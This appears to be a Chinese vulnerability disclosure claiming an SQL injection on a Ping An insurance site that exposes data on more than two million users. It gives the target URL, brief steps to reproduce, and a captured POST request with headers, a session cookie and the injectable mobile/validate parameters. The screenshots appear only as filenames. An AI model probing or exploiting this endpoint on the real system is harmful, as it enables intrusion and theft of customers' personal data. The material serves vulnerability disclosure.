中国平安某重要站点存在SQL注入涉及200多万用户信息

https://cdd.yun.pingan.com:8080/NewChannel/target/info

输入车牌号和手机号 点击获取验证码

POST /NewChannel/target/verify HTTP/1.1

Host: cdd.yun.pingan.com:8080

Accept: */*

Proxy-Connection: keep-alive

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Origin: https://cdd.yun.pingan.com:8080

Content-Length: 39

Connection: keep-alive

User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 MicroMessenger/6.3.15 NetType/WIFI Language/zh_CN

Referer: https://cdd.yun.pingan.com:8080/NewChannel/target/info

Cookie: WX_USER_OPEN_ID=0; JSESSIONID=F322F5DBBCD3D61B3A2E2792CC0CE72E

mobile=13012345678&validate=13012345678

2.jpg

3.jpg

3.jpg